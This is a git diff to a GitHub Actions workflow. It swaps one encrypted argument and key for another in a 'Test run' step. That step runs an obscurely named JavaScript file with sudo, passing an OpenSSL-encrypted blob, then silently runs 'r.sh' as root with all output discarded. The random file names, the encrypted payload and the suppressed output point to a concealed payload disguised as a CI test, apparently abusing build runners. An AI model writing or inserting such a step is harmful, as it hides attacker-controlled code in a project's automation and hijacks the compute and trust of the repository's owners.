--- a/.github/workflows/uecyp.yml
+++ b/.github/workflows/uecyp.yml
@@ -29,6 +29,6 @@ jobs:
     - name: Test run
       run: |
         cd ${{ github.workspace }}
-        echo 'u45gq'
+        echo 'x6kev'
         sudo chmod +x johns2xqp/field806dx/piersonteqsh/rubiox050l.js
-        sudo ./johns2xqp/field806dx/piersonteqsh/rubiox050l.js U2FsdGVkX185fJnlwa0OFcyHYJbzAzGbmQd7OsADzdmMNgoJVhAghBmKcg5D5vjbiOjmQmfRJ8B+BVY7DY0I7Epb8NxK5H3DXBQGr9BQ9Lib4mBSXseCtfHuTUy8i4u9 bvy3l0 && sudo sh r.sh > /dev/null 2>&1
+        sudo ./johns2xqp/field806dx/piersonteqsh/rubiox050l.js U2FsdGVkX19PlSJAVqcKYsnkaIdU48an9PxJ8olh9sMSZRqKjBd4338ZaH7MOyxbKGStTsWW4iU9kODPbM+hAudIk8tGWFr0rExPtP6IciGDBwPHfYn9J/bDsVSXU8He alykpx && sudo sh r.sh > /dev/null 2>&1
